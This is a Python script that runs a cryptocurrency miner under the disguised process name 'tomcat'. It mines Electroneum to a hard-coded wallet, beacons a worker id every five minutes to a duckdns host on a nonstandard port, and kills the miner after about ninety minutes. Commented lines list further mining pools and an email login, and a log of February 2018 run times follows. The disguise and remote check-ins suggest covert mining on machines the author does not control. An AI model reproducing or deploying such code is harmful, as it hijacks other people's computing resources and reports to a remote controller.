import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:33:06.472172
#2018-02-17 16:19:07.016615
#2018-02-17 18:08:01.401933
#2018-02-17 19:56:01.774823
#2018-02-17 21:44:06.344038
#2018-02-17 23:28:06.269028
#2018-02-18 01:18:06.435659
#2018-02-18 03:05:07.845253
#2018-02-18 04:54:05.488577
#2018-02-18 06:46:06.351017
#2018-02-18 08:34:01.625224
#2018-02-18 10:21:04.545842
#2018-02-18 12:07:06.670644
#2018-02-18 13:52:05.150283
#2018-02-18 15:42:04.766154
#2018-02-18 17:32:03.839286
#2018-02-18 19:19:01.865441
#2018-02-18 21:05:03.732637
#2018-02-18 22:51:04.661510
#2018-02-19 00:39:05.026764
#2018-02-19 02:25:05.453087
#2018-02-19 04:12:03.832551
#2018-02-19 05:56:04.221194
#2018-02-19 07:45:04.181831
#2018-02-19 09:36:04.494733
#2018-02-19 11:25:01.316347
#2018-02-19 13:11:08.803492
#2018-02-19 14:59:05.524747
#2018-02-19 16:47:07.879539
#2018-02-19 18:35:10.041512
#2018-02-19 20:22:08.693706
#2018-02-19 22:12:07.622581
#2018-02-19 23:57:06.392206
#2018-02-20 01:44:05.026810
#2018-02-20 03:33:05.507100
#2018-02-20 05:20:05.414992
#2018-02-20 07:03:07.174292
#2018-02-20 08:48:06.588979
#2018-02-20 10:32:06.068017
#2018-02-20 12:17:09.735657
#2018-02-20 14:05:09.812219
#2018-02-20 15:50:09.780357
#2018-02-20 17:35:08.129777
#2018-02-20 19:24:08.194436
#2018-02-20 21:13:07.061416
#2018-02-20 22:59:02.043793
#2018-02-21 00:42:07.898722
#2018-02-21 02:28:07.028314
#2018-02-21 04:14:05.294175
#2018-02-21 06:02:12.469037
#2018-02-21 07:51:06.190662
#2018-02-21 09:37:05.812095
#2018-02-21 11:27:05.985111
#2018-02-21 13:16:08.095475
#2018-02-21 15:02:01.466045
#2018-02-21 16:52:01.722964
#2018-02-21 18:42:01.520948
#2018-02-21 20:26:08.538675
#2018-02-21 22:15:10.295429
#2018-02-22 00:08:04.747106
#2018-02-22 01:57:03.840791
#2018-02-22 03:43:07.845141
#2018-02-22 05:30:06.895854
#2018-02-22 07:15:04.693452
#2018-02-22 09:02:05.603747
#2018-02-22 10:50:05.518536
#2018-02-22 12:36:05.048085
#2018-02-22 14:22:02.103596
#2018-02-22 16:09:04.145385
#2018-02-22 17:55:03.668734
#2018-02-22 19:43:03.896061
#2018-02-22 21:33:08.409790
#2018-02-22 23:22:04.791142
#2018-02-23 01:09:04.606240
#2018-02-23 02:56:05.330040
#2018-02-23 04:43:08.523184
#2018-02-23 06:29:06.334851
#2018-02-23 08:17:03.867436
#2018-02-23 10:35:01.410205
#2018-02-23 12:27:05.679152
#2018-02-23 14:14:06.478153
#2018-02-23 16:04:08.120004
#2018-02-23 17:51:06.059180
#2018-02-23 19:38:07.205450
#2018-02-23 21:22:02.171342
#2018-02-23 23:10:08.548307
#2018-02-24 00:51:05.229135
#2018-02-24 02:43:06.189763
#2018-02-24 04:37:07.083141
#2018-02-24 06:21:06.225864
#2018-02-24 08:09:05.209467
#2018-02-24 09:54:06.610484
#2018-02-24 11:48:06.217751
#2018-02-24 13:39:05.390637
#2018-02-24 15:26:04.483610
#2018-02-24 17:16:02.218223
#2018-02-24 19:07:05.061868
#2018-02-24 20:55:07.071046
#2018-02-24 23:22:01.891494
#2018-02-25 02:53:01.448531
#2018-02-25 06:24:06.494324
#2018-02-25 11:39:01.910562